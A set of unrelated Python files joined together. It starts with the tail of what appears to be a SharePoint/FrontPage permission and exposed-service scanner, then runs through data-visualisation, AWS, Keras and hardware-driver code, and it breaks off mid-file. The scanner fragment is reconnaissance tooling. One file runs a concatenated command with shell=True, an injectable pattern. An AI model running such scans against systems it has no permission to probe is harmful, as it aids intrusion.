logger.info(
"\n[+]-----------------------------------------------------------------")
logger.info(
"[+] auditing sharepoint '/catalog/' directory for access permissions")
logger.info(
"[+]------------------------------------------------------------------\n")
audit(sharepoint_target_catalog)
success("catalogs file access")
return
elif options.services == "serv" or options.services == "services":
build_target(target, front_services, refine_target)
logger.info(
"\n[+]---------------------------------------------------------------")
logger.info(
"[+] checking exposed services in the frontpage/sharepoint directory")
logger.info(
"[+]-----------------------------------------------------------------\n")
audit(refine_target)
success("exposed services check")
else:
logger.info("[-] please provide the proper scanning options")
logger.info(
"[+] check help (-h) for arguments and url specification")
sys.exit(0)
except ValueError as v:
logger.error(
"[-] ValueError occurred. Improper option argument or url")
logger.error("[+] check for help (-h) for more details")
sys.exit(0)
except TypeError as t:
logger.error("[-] TypeError occcured. Missing option argument or url")
logger.error("[+] check for help (-h) for more details")
sys.exit(0)
except IndexError as e:
usage()
sys.exit(0)
except urllib2.HTTPError as h:
logger.error("[-] HTTPError : %s" % h.code)
logger.error(
"[+] please specify the target with protocol handlers as http | https")
sys.exit(0)
except urllib2.URLError as u:
logger.error("[-] URLError : %s" % u.args)
logger.error(
"[+] please specify the target with protocol handlers as http | https")
sys.exit(0)
except KeyboardInterrupt:
logger.error("[-] halt signal detected, exiting the program\n")
sys.exit(0)
except None:
logger.info("[] Hey")
sys.exit(0)
# calling main
if __name__ == '__main__':
main()
|
n = int(input())
al = list(map(int, input().split()))
ave = sum(al)/n
ans = 0
ans_diff = abs(ave - al[0])
for i, a in enumerate(al):
if abs(ave-a) < ans_diff:
ans = i
ans_diff = abs(ave-a)
print(ans)
|
import argparse
import socket
parser = argparse.ArgumentParser(description='Task 1 Client')
parser.add_argument('--host', help='Hostname/IP to connect', default='127.0.0.1')
parser.add_argument('--port', help='Port to connect', default=1337)
parser.add_argument('-b', '--buffer', help='Connection buffer size', type=int, default=1024)
args = parser.parse_args()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
conn.connect((args.host, args.port))
conn.sendall('Hello, server!\n'.encode())
received = conn.recv(args.buffer).decode()
print(received, end='')
|
from bokeh.io import curdoc
from bokeh.layouts import column
from bokeh.layouts import row
from bokeh.models import HoverTool
from bokeh.models import LinearColorMapper
from bokeh.models import Slider
from bokeh.plotting import figure
from bokeh.tile_providers import STAMEN_TERRAIN_RETINA
from bokeh.models.widgets import TextInput
from core.data_helper import ImportUsgsEarthquakeData
from bokeh.models import ColumnDataSource, TableColumn, DataTable, NumberFormatter
from bokeh.models.widgets import PreText
class ShakeMeToBokeh:
_SOURCES_FILE = 'sources.txt'
_TOOLS = "box_select,pan,wheel_zoom,box_zoom,reset,save"
def __init__(self):
self._earthquakes_count = 0
source_data_formated = dict(mag=[], place=[], year=[], url=[], magType=[], title=[], x=[], y=[])
self.source_data = ColumnDataSource(data=source_data_formated)
self._X_RANGE_DEFAULT = (-2000000, 6000000)
self._Y_RANGE_DEFAULT = (-1000000, 7000000)
def run(self):
self._symbology()
self._bokeh_widgets()
self._bokeh_map_init()
self._bokeh_layers_init()
self._source_text_elements()
self._bokeh_map_layout()
def _bokeh_map_init(self):
hover = HoverTool(tooltips=[
("nom", "@title"),
("Lieu", "@place"),
("Annee", "@year"),
("magnitude", "@mag"),
])
# set canvas
self._plot = figure(
title="USGS EarthQuakes !",
plot_width=1024,
plot_height=600,
x_range=self._X_RANGE_DEFAULT,
y_range=self._Y_RANGE_DEFAULT,
x_axis_type="mercator",
y_axis_type="mercator",
output_backend="webgl",
tools=[hover, self._TOOLS]
)
# set background map
self._plot.add_tile(STAMEN_TERRAIN_RETINA)
def _bokeh_map_layout(self):
layout = column(
row(self._plot),
row(self._mag_value_widget, self._slider_widget, self._sources_text),
row(self._data_table),
)
curdoc().add_root(layout)
curdoc().title = "USGS Earthquakes Viewer"
def _bokeh_layers_init(self):
self._plot.circle(
x='x',
y='y',
source=self.source_data,
size='mag',
color={'field': 'mag', 'transform': self._color_mapper},
alpha=1,
legend="earthquake"
)
mag_format = NumberFormatter(format='0.0')
table_columns = [
TableColumn(field="title", title="nom"),
TableColumn(field="place", title="Localisation"),
TableColumn(field="year", title="Année"),
TableColumn(field="mag", title="Magnitude", formatter=mag_format),
TableColumn(field="url", title="Détails"),
]
self._data_table = DataTable(source=self.source_data, columns=table_columns, width=1024, height=250, editable=True)
def _bokeh_widgets(self):
self._mag_value_widget = TextInput(value="5", title="Choisir la magnitude minimale:")
self._mag_value_widget.on_change('value', self.__min_mag_value)
self._slider_widget = Slider(start=1950, end=2019, value=1950, step=1, title="Barre temporelle")
self._slider_widget.on_change('value', self.__slider_update)
def __min_mag_value(self, attrname, old, new):
data = ImportUsgsEarthquakeData(
int(self._slider_widget.value),
int(self._slider_widget.value) + 1,
self._mag_value_widget.value
).run()
print(len(data))
self.source_data.data = self.__format_source_data(data)
def __slider_update(self, attrname, old, new):
data = ImportUsgsEarthquakeData(
int(self._slider_widget.value),
int(self._slider_widget.value) + 1,
self._mag_value_widget.value
).run()
print(len(data))
self.source_data.data = self.__format_source_data(data)
def __format_source_data(self, source_data):
"""
:param source_data: geopandas.geodataframe.GeoDataFrame
:return: dict
"""
return dict(
mag=source_data['mag'].tolist(),
place=source_data['place'].tolist(),
url=source_data['url'].tolist(),
year=source_data['year'].tolist(),
magType=source_data['magType'].tolist(),
title=source_data['title'].tolist(),
x=source_data['x'].tolist(),
y=source_data['y'].tolist()
)
def _symbology(self):
self._color_mapper = LinearColorMapper(
palette='Magma10',
low=10,
high=1
)
def _source_text_elements(self):
self._sources_text = PreText(
text=open(self._SOURCES_FILE, 'r').read(),
width=500,
height=100
)
ShakeMeToBokeh().run() |
import string
from typing import Union
from sc2 import UnitTypeId
class UnitCount:
def __init__(self, enemy_type: UnitTypeId, count: Union[int, float]):
assert isinstance(enemy_type, UnitTypeId)
assert isinstance(count, int) or isinstance(count, float)
self.count = count
self.enemy_type: UnitTypeId = enemy_type
def __str__(self):
name = self.enemy_type.name
return name + ": " + str("{0:.1f}".format(self.count))
def to_short_string(self) -> string:
name = self.enemy_type.name[:3].lower()
return name + " " + str("{0:.1f}".format(self.count))
|
import json
import itertools
from typing import (
Any,
)
from substratum.types import (
RPCEndpoint,
RPCResponse,
)
from substratum.utils import (
to_bytes,
to_text,
)
class BaseProvider:
def make_request(self, method: RPCEndpoint, params: Any) -> RPCResponse:
raise NotImplementedError("Providers must implement this method")
class JSONBaseProvider(BaseProvider):
def __init__(self) -> None:
self.request_counter = itertools.count()
def decode_rpc_response(self, raw_response: bytes) -> RPCResponse:
text_response = to_text(raw_response)
return json.loads(text_response)
def encode_rpc_request(self, method: RPCEndpoint, params: Any) -> bytes:
rpc_dict = {
"jsonrpc": "2.0",
"method": method,
"params": params or [],
"id": next(self.request_counter),
}
encoded = json.dumps(rpc_dict)
return to_bytes(text=encoded)
|
from os import path
import sys
import subprocess
from typing import List
from ._make_experiment_csv import make_experiment_csv
def write_experiment(
db_credentials:str, output_folder:str, image_ids,
spot_channels:List[str], stain_channels:List[str] = None,
nuc_channels:List[str] = None, metadata_format:str = 'micromanager',
positions:List[int] = [0], time:int=0,
data_path:str = '/Volumes/imaging/czbiohub-imaging/',
img_format: str = 'PNG'
):
"""
Writes the spacetx format experiment files for analysis in starfish
Parameters
----------
db_credentials : str
Path to the database credentials file
output_folder : str
Path to save the experiment files to
image_ids : List[str]
List of the image IDs to include in the data set. Each image id will be a "round" in starfish.
spot_channels : List[str]
A list of the channels containing the spots
stain_channels : List[str]
A list of the channels containing any auxillary stains
(e.g., GFP or membrane stain for segmentation)
nuc_channels : List[str]
A list of the channels containing any nuclear stains (e.g., DAPI)
metadata_format : str
Format for the image metadata on imagingDB. For micromanager, set to 'micromanager'.
Default value is 'micromanager'
positions : int
Index of the position to download. The default value is 0.
time : int
Index of the time point to download. The default value is 0.
data_path : str
Path to the image store volume
"""
spots_file_path = path.join(output_folder, 'spots.csv')
tile_width, tile_height = make_experiment_csv(
db_credentials, spots_file_path, image_ids,
spot_channels, metadata_format, positions, time,
data_path
)
csv_args = 'primary ' + spots_file_path
if stain_channels is not None:
stain_file_path = path.join(output_folder, 'stain.csv')
_, _ = make_experiment_csv(
db_credentials, stain_file_path, image_ids,
stain_channels, metadata_format, positions, time
)
csv_args += ' --csv-file stain ' + stain_file_path
if nuc_channels is not None:
stain_file_path = path.join(output_folder, 'nuclei.csv')
_, _ = make_experiment_csv(
db_credentials, stain_file_path, image_ids,
nuc_channels, metadata_format, positions, time
)
csv_args += ' --csv-file nuclei ' + stain_file_path
cmd = 'spacetx_biohub_writer ' + '--tile-width ' + str(tile_width) + ' ' + \
'--tile-height ' + str(tile_height) + ' ' + \
'--s3-prefix ' + data_path + ' ' + \
'--output-dir ' + output_folder + ' ' + \
'--image_format ' + img_format + ' ' + \
'--csv-file ' + csv_args
subprocess.call(cmd, shell=True)
|
from setuptools import setup, find_packages
version = open("VERSION").read().strip()
with open("requirements.txt", encoding="utf8") as handle:
reqs = handle.readlines()
with open("requirements-dev.txt", encoding="utf8") as handle:
dev_reqs = handle.readlines()
setup(
name="wgh-ner",
version=version,
author="Grayson Hilliard",
author_email="grsn.hilliard@gmail.com",
url="",
description="",
long_description=open("README.md").read(),
classifiers=[
"Operating System :: POSIX",
"Programming Language :: Python",
],
packages=find_packages("ner"),
install_requires=reqs,
extras_require={
"dev": dev_reqs,
},
platforms="any",
)
|
# -*- coding: utf-8 -*-
#
# © 2015-2016 Krux Digital, Inc.
#
#
# Standard libraries
#
from functools import wraps
# Declare the baseboto class a metaclass to avoid
# it being used directly
from abc import ABCMeta, abstractmethod
import os
#
# Third party libraries
#
# For differences between version2 & version3, please see here:
# http://boto3.readthedocs.org/en/latest/guide/migration.html
# Version2
import boto
import boto.ec2
import boto.utils
# Version3
import boto3
from six import iteritems
#
# Internal libraries
#
from krux.logging import get_logger, LEVELS, DEFAULT_LOG_LEVEL
from krux.stats import get_stats
from krux.cli import get_parser, get_group
from krux_boto.util import RegionCode
# Constants
ACCESS_KEY = 'AWS_ACCESS_KEY_ID'
SECRET_KEY = 'AWS_SECRET_ACCESS_KEY'
REGION = 'AWS_DEFAULT_REGION'
NAME = 'krux-boto'
# GOTCHA: This is not meant to be imported by another library. Thus, prefix with double underscore.
__DEFAULT_REGION = 'us-east-1'
# Defaults
# GOTCHA: If this is a simple string-to-string dictionary, values are evaluated on compilation.
# This may cause some serious hair pulling if the developer decides to change the environment variable
# and expect krux-boto to pick it up. Thus, make this a string-to-function dictionary
# so the values are evaluated on method call and get up-to-date value.
DEFAULT = {
'log_level': lambda: DEFAULT_LOG_LEVEL,
'access_key': lambda: os.environ.get(ACCESS_KEY),
'secret_key': lambda: os.environ.get(SECRET_KEY),
# GOTCHA: Unlike credentials, this is defaulted to environment variable, but not required. Create a default
# fall-back value.
'region': lambda: os.environ.get(REGION, __DEFAULT_REGION),
}
def __get_arguments(args=None, logger=None, stats=None):
"""
A helper method that generates a dictionary of arguments needed to instantiate a BaseBoto object.
The purpose of this method is to abstract out the code to handle optional CLI arguments
and not duplicate the None handling code.
:param args: Namespace of arguments parsed by argparse
:type args: argparse.Namespace
:param logger: Logger, recommended to be obtained using krux.cli.Application
:type logger: logging.Logger
:param stats: Stats, recommended to be obtained using krux.cli.Application
:type stats: kruxstatsd.StatsClient
:return: A dictionary of arguments needed for BaseBoto.__init__()
:rtype: dict
"""
if not args:
parser = get_parser()
add_boto_cli_arguments(parser)
# Parse only the known arguments added by add_boto_cli_arguments().
# We only need those arguments to create Boto object, nothing else.
# parse_known_args() return (Namespace, list of unknown arguments),
# we only care about the Namespace object here.
args = parser.parse_known_args()[0]
if not logger:
logger = get_logger(name=NAME)
if not stats:
stats = get_stats(prefix=NAME)
return {
'log_level': getattr(args, 'boto_log_level', DEFAULT['log_level']()),
'access_key': getattr(args, 'boto_access_key', DEFAULT['access_key']()),
'secret_key': getattr(args, 'boto_secret_key', DEFAULT['secret_key']()),
'region': getattr(args, 'boto_region', DEFAULT['region']()),
'logger': logger,
'stats': stats,
}
def get_boto(args=None, logger=None, stats=None):
"""
Return a usable Boto object without creating a class around it.
In the context of a krux.cli (or similar) interface the 'args', 'logger'
and 'stats' objects should already be present. If you don't have them,
however, we'll attempt to provide usable ones for the boto setup.
(If you omit the add_boto_cli_arguments() call during other cli setup,
the Boto object will still work, but its cli options won't show up in
--help output)
:param args: Namespace of arguments parsed by argparse
:type args: argparse.Namespace
:param logger: Logger, recommended to be obtained using krux.cli.Application
:type logger: logging.Logger
:param stats: Stats, recommended to be obtained using krux.cli.Application
:type stats: kruxstatsd.StatsClient
:return: Boto object created with the arguments, logger, and stats created or deduced
:rtype: krux_boto.boto.Boto
"""
return Boto(**__get_arguments(args, logger, stats))
def get_boto3(args=None, logger=None, stats=None):
"""
Return a usable Boto3 object without creating a class around it.
In the context of a krux.cli (or similar) interface the 'args', 'logger'
and 'stats' objects should already be present. If you don't have them,
however, we'll attempt to provide usable ones for the boto setup.
(If you omit the add_boto_cli_arguments() call during other cli setup,
the Boto object will still work, but its cli options won't show up in
--help output)
:param args: Namespace of arguments parsed by argparse
:type args: argparse.Namespace
:param logger: Logger, recommended to be obtained using krux.cli.Application
:type logger: logging.Logger
:param stats: Stats, recommended to be obtained using krux.cli.Application
:type stats: kruxstatsd.StatsClient
:return: Boto3 object created with the arguments, logger, and stats created or deduced
:rtype: krux_boto.boto.Boto3
"""
return Boto3(**__get_arguments(args, logger, stats))
# Designed to be called from krux.cli, or programs inheriting from it
def add_boto_cli_arguments(parser, include_log_level=True, include_credentials=True, include_region=True):
group = get_group(parser, 'boto')
if include_log_level:
group.add_argument(
'--boto-log-level',
default=DEFAULT['log_level'](),
choices=list(LEVELS.keys()),
help="Verbosity of boto logging. (default: %(default)s)",
)
if include_credentials:
group.add_argument(
'--boto-access-key',
default=DEFAULT['access_key'](),
help="AWS Access Key to use. Defaults to ENV[{0}]".format(ACCESS_KEY),
)
group.add_argument(
'--boto-secret-key',
default=DEFAULT['secret_key'](),
help="AWS Secret Key to use. Defaults to ENV[{0}]".format(SECRET_KEY),
)
if include_region:
group.add_argument(
'--boto-region',
default=DEFAULT['region'](),
choices=[r.name for r in boto.ec2.regions()],
help=(
"EC2 Region to connect to. Defaults to ENV[{0}]. If not ENV set, defaults to us-east-1.".format(REGION)
),
)
class BaseBoto(metaclass=ABCMeta):
# This is an abstract class, which prevents direct instantiation. See here
# for details: https://docs.python.org/2/library/abc.html
def __init__(
self,
log_level=None,
access_key=None,
secret_key=None,
region=None,
logger=None,
stats=None,
):
# Private variables, not to be used outside this module
self._name = NAME
self._logger = logger or get_logger(self._name)
self._stats = stats or get_stats(prefix=self._name)
if log_level is None:
log_level = DEFAULT['log_level']()
if access_key is None:
access_key = DEFAULT['access_key']()
if secret_key is None:
secret_key = DEFAULT['secret_key']()
if region is None:
region = DEFAULT['region']()
if REGION not in os.environ:
self._logger.debug(
"There is not a default region set in your environment variables. Defaulted to '%s'", region
)
# GOTCHA: Due to backward incompatible version change in v1.0.0, the users of krux_boto may
# pass wrong credential. Make sure the passed credential via CLI is the same as one passed into this instance.
parser = get_parser()
add_boto_cli_arguments(parser)
# GOTCHA: We only care about the credential arguments and nothing else.
# Don't validate the arguments or parse other things. Let krux.cli do that.
args = parser.parse_known_args()
_access_key = getattr(args, 'boto_access_key', None)
_secret_key = getattr(args, 'boto_secret_key', None)
if _access_key is not None and _access_key != access_key:
self._logger.warn(
'You set a different boto-access-key in CLI. '
'To avoid this error, consider using get_boto() function. '
'For more information, please check README.'
)
if _secret_key is not None and _secret_key != secret_key:
self._logger.warn(
'You set a different boto-secret-key in CLI. '
'To avoid this error, consider using get_boto() function. '
'For more information, please check README.'
)
# Infer the loglevel, but set it as a property so the subclasses can
# use it to set the loglevels on the loghandlers for their implementation
self._boto_log_level = LEVELS[log_level]
# this has to be 'public', so callers can use it. It's unfortunately
# near impossible to transparently wrap this, because the boto.config
# is initialized before we get here, and all the classes do a look up
# at compile time. So overriding doesn't help.
# Wrapping doesn't work cleanly, because we 1) would have to wrap
# everything, including future features we can't know about yet, as
# well as 2) poke into the guts of the implementation classes to figure
# out connection strings etc. It's quite cumbersome.
# So for now, we just store the region that was asked for, and let the
# caller use it. See the sample app for a howto.
self.cli_region = region
# if these are set, make sure we set the environment again
# as well; that way the underlying boto calls will just DTRT
# without the need to wrap all the functions.
credential_map = {
ACCESS_KEY: access_key,
SECRET_KEY: secret_key,
}
for env_var, val in iteritems(credential_map):
if val is None or len(val) < 1:
self._logger.debug('Passed boto credentials is empty. Falling back to environment variable %s', env_var)
else:
# this way we can tell what credentials are being used,
# without dumping the whole secret into the logs
self._logger.debug('Setting boto credential %s', env_var)
os.environ[env_var] = val
# If at this point the environment variable is NOT set,
# you didn't set it, and we didn't set it. At which point
# boto will go off spelunking for .boto files or other
# settings. Best be clear about this. Using 'if not' because
# if you set it like this:
# $ FOO= ./myprog.py
# It'll return an empty string, and we'd not catch it.
if not os.environ.get(env_var, None):
self._logger.debug(
'Boto environment credential %s NOT explicitly set ' +
'-- boto will look for a .boto file somewhere', env_var
)
def __getattr__(self, attr):
"""Proxies calls to ``boto.*`` methods."""
# This way, we don't have to write: rv = Boto().boto.some_call
# But can just write: rv = Boto().some_call
# This also gives us hooks for future logging/timers/etc and
# extended wrapping of things the attributes return if we so
# choose.
self._logger.debug('Calling wrapped boto attribute: %s on %s', attr, self)
attr = getattr(self._boto, attr)
if callable(attr):
self._logger.debug("Boto attribute '%s' is callable", attr)
@wraps(attr)
def wrapper(*args, **kwargs):
return attr(*args, **kwargs)
return wrapper
return attr
@abstractmethod
def get_valid_regions(self):
"""
Gets all AWS regions that Krux can access
:return: A list of :py:class:`RegionCode.Region` for the known regions. For any new regions
for which the enum does not exist, just returns the name of the region as a string.
:rtype: list[RegionCode.Region]
"""
pass
class Boto(BaseBoto):
# All the hard work is done in the superclass. We just need to use the
# resulting object to initialize a session properly.
def __init__(self, *args, **kwargs):
# Call to the superclass to resolve.
super(Boto, self).__init__(*args, **kwargs)
# access the boto classes via the object. Note these are just the
# classes for internal use, NOT the object as exposed via the CLI
# or the objects returned via the get_boto* calls
self._boto = boto
# This sets the log level for the underlying boto library
get_logger('boto').setLevel(self._boto_log_level)
def get_valid_regions(self):
"""
Gets all AWS regions that Krux can access
:return: A list of :py:class:`RegionCode.Region` for the known regions. For any new regions
for which the enum does not exist, just returns the name of the region as a string.
:rtype: list[RegionCode.Region]
"""
conn = self._boto.ec2.connect_to_region(self.cli_region)
regions = []
for region in conn.get_all_regions():
if getattr(RegionCode.Region, region.name, None) is not None:
regions.append(RegionCode.Region[region.name])
else:
regions.append(region.name)
return regions
class Boto3(BaseBoto):
# All the hard work is done in the superclass. We just need to use the
# resulting object to initialize a session properly.
def __init__(self, *args, **kwargs):
# Call to the superclass to resolve.
super(Boto3, self).__init__(*args, **kwargs)
# In boto3, the custom settings like region and connection params are
# stored in what's called a 'session'. This object behaves just like
# the boto3 class invocation, but it uses your custom settings instead.
# Read here for details: http://boto3.readthedocs.org/en/latest/guide/session.html
# Creating your own session, based on the region that was passed in
session = boto3.session.Session(region_name=self.cli_region)
# access the boto classes via the session. Note these are just the
# classes for internal use, NOT the object as exposed via the CLI
# or the objects returned via the get_boto* calls
self._boto = session
# This sets the log level for the underlying boto library
# http://boto3.readthedocs.org/en/latest/reference/core/boto3.html?highlight=logging
# XXX note that the name of the default boto3 logger is NOT boto3, it's
# called 'botocore'
get_logger('botocore').setLevel(self._boto_log_level)
def get_valid_regions(self):
"""
Gets all AWS regions that Krux can access
:return: A list of :py:class:`RegionCode.Region` for the known regions. For any new regions
for which the enum does not exist, just returns the name of the region as a string.
:rtype: list[RegionCode.Region]
"""
client = self._boto.client('ec2')
regions = []
for region in client.describe_regions().get('Regions', []):
if getattr(RegionCode.Region, region.get('RegionName'), None) is not None:
regions.append(RegionCode.Region[region.get('RegionName')])
else:
regions.append(region.get('RegionName'))
return regions
|
from keras.models import load_model
import numpy as np
from keras.optimizers import Adam
from keras.models import Model
from keras.layers import Dense, Conv2D, Conv3D, BatchNormalization, Activation, \
Concatenate, AvgPool2D, Input, MaxPool2D, UpSampling2D, Add, \
ZeroPadding2D, ZeroPadding3D, Lambda, Reshape, Flatten, LeakyReLU
# from keras_contrib.layers import InstanceNormalization
from keras.callbacks import ModelCheckpoint
from keras import backend as K
import keras
import cv2
import os
import librosa
import scipy
from keras.utils import plot_model
import tensorflow as tf
import tensorflow_addons as tfa
# from keras.utils import multi_gpu_model
import tensorflow as tf
from keras import backend as K
class ModelMGPU(Model):
def __init__(self, ser_model, gpus):
# pmodel = multi_gpu_model(ser_model, gpus)
# self.__dict__.update(pmodel.__dict__)
self._smodel = ser_model
def __getattribute__(self, attrname):
'''Override load and save methods to be used from the serial-model. The
serial-model holds references to the weights in the multi-gpu model.
'''
# return Model.__getattribute__(self, attrname)
if 'load' in attrname or 'save' in attrname:
return getattr(self._smodel, attrname)
return super(ModelMGPU, self).__getattribute__(attrname)
def contrastive_loss(y_true, y_pred):
margin = 1.
loss = (1. - y_true) * K.square(y_pred) + y_true * K.square(K.maximum(0., margin - y_pred))
return K.mean(loss)
def conv_block(x, num_filters, kernel_size=3, strides=2, padding='same'):
x = Conv2D(filters=num_filters, kernel_size= kernel_size,
strides=strides, padding=padding)(x)
x = tfa.InstanceNormalization()(x)
x = LeakyReLU(alpha=.2)(x)
return x
def create_model(args, mel_step_size):
############# encoder for face/identity
input_face = Input(shape=(args.img_size, args.img_size, 3), name="input_face_disc")
x = conv_block(input_face, 64, 7)
x = conv_block(x, 128, 5)
x = conv_block(x, 256, 3)
x = conv_block(x, 512, 3)
x = conv_block(x, 512, 3)
x = Conv2D(filters=512, kernel_size=3, strides=1, padding="valid")(x)
face_embedding = Flatten() (x)
############# encoder for audio
input_audio = Input(shape=(80, mel_step_size, 1), name="input_audio")
x = conv_block(input_audio, 32, strides=1)
x = conv_block(x, 64, strides=3) #27X9
x = conv_block(x, 128, strides=(3, 1)) #9X9
x = conv_block(x, 256, strides=3) #3X3
x = conv_block(x, 512, strides=1, padding='valid') #1X1
x = conv_block(x, 512, 1, strides=1)
audio_embedding = Flatten() (x)
# L2-normalize before taking L2 distance
l2_normalize = Lambda(lambda x: K.l2_normalize(x, axis=1))
face_embedding = l2_normalize(face_embedding)
audio_embedding = l2_normalize(audio_embedding)
d = Lambda(lambda x: K.sqrt(K.sum(K.square(x[0] - x[1]), axis=1, keepdims=True))) ([face_embedding,
audio_embedding])
model = Model(inputs=[input_face, input_audio], outputs=[d])
model.summary()
if args.n_gpu > 1:
model = ModelMGPU(model , args.n_gpu)
model.compile(loss=contrastive_loss, optimizer=Adam(lr=args.lr))
return model
if __name__ == '__main__':
model = create_model()
#plot_model(model, to_file='model.png', show_shapes=True)
|
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Enum Class
# this is a auto generated file generated by Cheetah
# Namespace: com.sun.star.table
# Libre Office Version: 7.3
from enum import Enum
class ShadowLocation(Enum):
"""
Enum Class
See Also:
`API ShadowLocation <https://api.libreoffice.org/docs/idl/ref/namespacecom_1_1sun_1_1star_1_1table.html#a9ab4ece6abe8ce0c4ad3123d6e3916c0>`_
"""
__ooo_ns__: str = 'com.sun.star.table'
__ooo_full_ns__: str = 'com.sun.star.table.ShadowLocation'
__ooo_type_name__: str = 'enum'
BOTTOM_LEFT = 'BOTTOM_LEFT'
"""
shadow is located along the lower and left sides.
"""
BOTTOM_RIGHT = 'BOTTOM_RIGHT'
"""
shadow is located along the lower and right sides.
"""
NONE = 'NONE'
"""
no shadow.
"""
TOP_LEFT = 'TOP_LEFT'
"""
shadow is located along the upper and left sides.
"""
TOP_RIGHT = 'TOP_RIGHT'
"""
shadow is located along the upper and right sides.
"""
__all__ = ['ShadowLocation']
|
# coding=utf-8
import datetime
epoch = datetime.datetime.utcfromtimestamp(0)
class DateFormats(object):
Full = '%m/%d/%Y %H:%M:%S.%f'
def epoch_seconds(dt):
return (dt - epoch).total_seconds()
def formated(dt, format_str=DateFormats.Full):
return dt.strftime(format_str)
if __name__ == '__main__':
print(formated(datetime.datetime.now()))
|
TRUE = 1 # ACK, YES
FALSE = 0 # NAK, NO
class cursor (object):
def __init__ (me, height, width, show=FALSE):
me.height = height
me.width = width
me.show = show
me.reset()
def reset (me):
me.row = 0
me.col = 0
def line_feed (me):
'''
return TRUE if need scroll
'''
me.row += 1
if me.row < me.height:
return FALSE
else:
me.row -= 1
return TRUE
def move_right (me, wrap):
'''
move right, no wrap, stop out of bondary
return (TRUE/FLASE, TRUE/FALSE) to indicate (scroll, line feed)
'''
me.col += 1
if me.col < me.width:
return (FALSE, FALSE)
else:
me.col = 0
return (me.line_feed (), TRUE)
def move_left (me):
'''
move left, don't change row, stop at col 0
'''
if me.col > 0:
me.col -= 1
from font import font8x8
class text_frame (object):
'''
sh1106 {busmst
/
text_frame
{font \
{buffer other_panel {busmst
{cursor
'''
WIDTH = 128
HEIGHT = 64
PAGE = 8 # 8-line / page, = font_sizes
def __init__ (me, font):
me.ox = 0
me.oy = 0
me.sz = me.PAGE
me.buffer = [0] * (me.WIDTH *me.HEIGHT *me.PAGE)
me.cursor = cursor((me.HEIGHT-me.oy) / me.sz, \
(me.WIDTH -me.ox) / me.sz) # rows-1, columns-1
me.font = font if font else font8x8()
if font and me.cursor.show == TRUE:
me.put ('_')
def page_flush (me, pages): raise NotImplementedError()
def _put_ (me, char):
'''
page(s) of the row
mask(s) of the row
the row will cover one page or several pages
'''
rem = ((me.cursor.row+1) * me.sz + me.oy) % me.PAGE
pages = range(((me.cursor.row) * me.sz + me.oy) / me.PAGE, \
((me.cursor.row+1) * me.sz + me.oy) / me.PAGE + (1 if rem>0 else 0))
masks = [0xff] * len(pages)
masks[0] = 0xff << rem
if rem > 0:
masks[-1] = 0xff >> (me.PAGE-rem)
for yy in me.pages_row():
for xx in range(me.PAGE):
me.buffer[me.WIDTH *me.cursor.row + \
me.PAGE *me.cursor.col + xx] = \
me.font.bitmap[ord(char)-ord(' ')][xx]
def put (me, char):
for xx in range(me.PAGE):
me.buffer[me.WIDTH *me.cursor.row + \
me.PAGE *me.cursor.col + xx] = \
me.font.bitmap[ord(char)-ord(' ')][xx]
def scroll (me, row):
'''
returns all the pages for flushing
'''
for xx in range(me.cursor.height):
for yy in range(me.WIDTH):
me.buffer[me.WIDTH * xx + yy] = \
me.buffer[me.WIDTH *(xx+row) + yy] if xx+row < me.cursor.height else 0
return range(me.cursor.height)
def putc (me, char, wrap=FALSE, flush=TRUE):
'''
support wrap option
'''
pages = [me.cursor.row] # page needs flushing
(scroll, line_feed, erase) = (FALSE, FALSE, me.cursor.show)
if wrap == TRUE and me.cursor.col >= me.cursor.width:
erase = FALSE
(scroll, line_feed) = me.cursor.move_right (wrap)
if me.cursor.col < me.cursor.width:
if ord(char)>=ord(' ') and ord(char)<127: # printable
me.put (char)
(scroll, line_feed) = me.cursor.move_right (wrap)
elif erase == TRUE:
me.put (' ') # erase the cursor
if ord(char) == 0x08: # BS
me.cursor.move_left ()
me.put (' ') # erase the character
elif ord(char) == 0x0A: # LF (^j/J)
# print 'LF'
(scroll, line_feed) = (me.cursor.line_feed (), me.cursor.show)
elif ord(char) == 0x0C: # FF (^l/L)
# print 'FF'
pages = me.scroll (me.cursor.height)
(scroll, line_feed) = (FALSE, FALSE)
me.cursor.reset ()
elif ord(char) == 0x0D: # CR
# print 'CR'
me.cursor.col = 0
if wrap == TRUE:
(scroll, line_feed) = (me.cursor.line_feed (), me.cursor.show)
if scroll == TRUE: pages = me.scroll (1)
elif line_feed == TRUE and \
me.cursor.show == TRUE: pages += [me.cursor.row]
if me.cursor.show == TRUE: me.put ('_')
if flush == TRUE: me.page_flush (pages)
def puts (me, text, align='left'):
'''
no wrap
'''
if align=='left' : me.cursor.col = 0
elif align=='right' : me.cursor.col = me.cursor.width - len(text)
elif align=='center': me.cursor.col = (me.cursor.width - len(text))/2
else: print 'align error'
for yy in text:
me.putc (yy, TRUE, TRUE)
# me.page_flush ([me.cursor.row])
class sh1106 (text_frame):
_SET_CONTRAST = 0x81
_SET_NORM_INV = 0xa6
_SET_DISP = 0xae
_SET_SCAN_DIR = 0xc0
_SET_SEG_REMAP = 0xa0
_LOW_COLUMN_ADDRESS = 0x00
_HIGH_COLUMN_ADDRESS = 0x10
_SET_PAGE_ADDRESS = 0xb0
def __init__ (me, i2cmst=None, font=None, flush=TRUE, on=TRUE, off=TRUE):
text_frame.__init__ (me, font)
me.busmst = i2cmst
me.off = off
if flush: me.page_flush (range(me.HEIGHT/me.PAGE)) # clear all
if on: me.poweron ()
def __del__ (me):
if me.off: me.poweroff ()
# print 'class %s died' % (me.__class__.__name__)
def write_cmd (me, cmd):
me.busmst.write (0x3c,0x80,[cmd]) # Co=1, D/C#=0
def write_dat (me, buf):
me.busmst.write (0x3c,0x40,buf)
def poweron (me):
me.write_cmd (me._SET_DISP | 0x01)
def poweroff (me):
me.write_cmd (me._SET_DISP | 0x00)
def page_flush (me, pages):
for page in pages:
me.write_cmd (me._SET_PAGE_ADDRESS | page)
me.write_cmd (me._LOW_COLUMN_ADDRESS | 2)
me.write_cmd (me._HIGH_COLUMN_ADDRESS | 0)
me.write_dat (me.buffer[me.WIDTH*page : me.WIDTH*(page+1)])
if __name__ == '__main__':
def test_loop (item):
